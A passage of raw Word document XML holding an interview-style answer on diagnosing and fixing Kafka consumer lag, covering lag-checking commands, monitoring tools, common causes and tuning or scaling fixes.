          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to take advantage of the latest performance improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630877B0" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Monitor and fix broker issues</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure they are not slowing down message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E478D2" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Implement backpressure handling</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using pause/resume mechanisms or rate-limiting strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FC00FC" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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By following these steps, you can mitigate or eliminate consumer lag in Kafka and improve the performance of your message processing pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D971D02" w14:textId="0CE66704"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D34F571">
          <v:rect id="_x0000_i3242" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5940CDD6" w14:textId="54ED7480" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D77D57" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="811" w:name="_Toc196308291"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Describe how you would troubleshoot and resolve consumer lag issues, including identifying the root cause and optimizing consumer performance</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="811"/>
    </w:p>
    <w:p w14:paraId="193B9F32" w14:textId="3F48228E" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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o troubleshoot and resolve Kafka consumer lag issues, it’s important to systematically identify the root cause, analyze the environment, and optimize consumer performance. Here’s a structured approach to handle consumer lag issues effectively:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F56FA09" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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1. Identify the Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2FFF0" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D444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he first step is to verify that consumer lag is indeed the issue. Consumer lag occurs when the consumer is falling behind the producer in terms of processing messages. Here’s how to identify and confirm the problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E17DC4" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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a. Check Consumer Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2B168" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D444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Use tools to check the lag of your consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567C9728" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Kafka Consumer Group Command</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can check the consumer lag using the kafka-consumer-groups.sh command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BFB21A" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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kafka-consumer-groups.sh --bootstrap-server &lt;kafka-broker&gt; --describe --group &lt;consumer-group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49203762" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D444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his will show the lag (difference between the consumer's offset and the latest offset in the partition).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F97D52" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Kafka Monitoring Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Burrow</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help visualize consumer lag in real-time. This will give you insight into how much behind your consumers are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549A102" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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b. Monitor Kafka Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2AB0F" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D444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Use JMX or Kafka monitoring tools (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus + Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to monitor the overall health of the Kafka cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559366A" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Broker Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Check metrics like request rates, disk usage, CPU usage, and memory usage. Look for bottlenecks or resource exhaustion that could be slowing down the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8963CB" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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onsumer Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Track metrics related to consumers, such as message consumption rate, fetch time, and network usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C609B5" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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2. Identify Potential Causes of Consumer Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F4FF9" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D444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Once you’ve confirmed that lag is happening, the next step is to identify why it’s happening. The common reasons for consumer lag are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5C00E4" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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a. Consumer Performance Bottlenecks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109AE101" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Heavy Processing Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer might not be able to process messages quickly enough because of heavy computations, complex data transformations, or time-consuming external calls (e.g., database writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B6A35B" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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low IO Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the consumer writes messages to disk or interacts with external systems (e.g., databases), I/O performance can become a bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A5922F" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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ingle Consumer Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If only one consumer in the consumer group is processing large volumes of data, it could lead to lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5CA6B" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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b. Consumer Configuration Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9377AA" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Incorrect Consumer Configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer configuration might not be optimized. For example, low values for max.poll.records, fetch.min.bytes, or fetch.max.bytes could lead to inefficient message fetching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6273ED" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Message Processing Time</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The max.poll.interval.ms might be too low for your consumer to process messages, leading to frequent rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1506034C" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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c. Insufficient Resources (CPU, Memory, Disk, Network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B936EE" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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onsumer Resource Limits</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer instance may not have enough CPU or memory to process messages quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D0468" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Network Bottlenecks</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If there is insufficient network throughput between the consumer and the Kafka broker, it could slow down message fetching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EC93E" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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d. Broker Performance Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391B49F5" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Broker Overload</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers might be under heavy load, unable to serve data efficiently to consumers, leading to increased fetch times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F10E59" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Disk I/O Bottlenecks</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If brokers have slow disk I/O, consumers might experience delays in retrieving messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C05E13" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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e. Partitioning Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E5CE67" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Few Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If there are not enough partitions for the number of consumers, some consumers might be overloaded with work, causing lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092C148C" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Unbalanced Partition Assignments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Uneven partition distribution among consumers can cause one consumer to process significantly more messages than others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1CEB24" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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3. Troubleshoot and Fix the Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75AB55" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D444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lastRenderedPageBreak/>
        <w:t>Once the possible causes are identified, take the appropriate actions to fix the problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003A9B0C" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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a. Optimize Consumer Processing Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635AD38E" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Improve Efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Review the consumer’s logic to ensure it is efficient. Optimize complex computations and reduce time spent on each message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E72D145" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Batch Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the consumer processes each message individually, switch to batch processing to reduce overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D30E66" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Parallel Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consider using parallelism within the consumer to process multiple messages concurrently, if possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC19BA" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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b. Adjust Consumer Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3B0A9" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Increase max.poll.records</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This allows the consumer to fetch more messages in a single poll, reducing the number of fetch calls and improving throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D3729" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Adjust fetch.min.bytes and fetch.max.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These settings control the amount of data fetched in each request. Increase them to fetch more data at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A9EBCB" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Tune max.poll.interval.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that this value is large enough to accommodate the consumer’s processing time, preventing unnecessary rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC7CB05" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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c. Scale the Consumer Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C47DD3" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Add More Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the consumer group is not scaled adequately, add more consumers to handle the load. Kafka ensures that each partition is consumed by only one consumer at a time, so adding consumers will help distribute the load more effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681BB6A1" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Increase Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the number of partitions is less than the number of consumers, increase the number of partitions to improve parallelism and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A3A6C" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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d. Scale Consumer Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E00557" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Increase CPU and Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allocate more resources to the consumer (e.g., scale vertically or horizontally in cloud environments).</w:t>
      </w:r>
    </w:p>
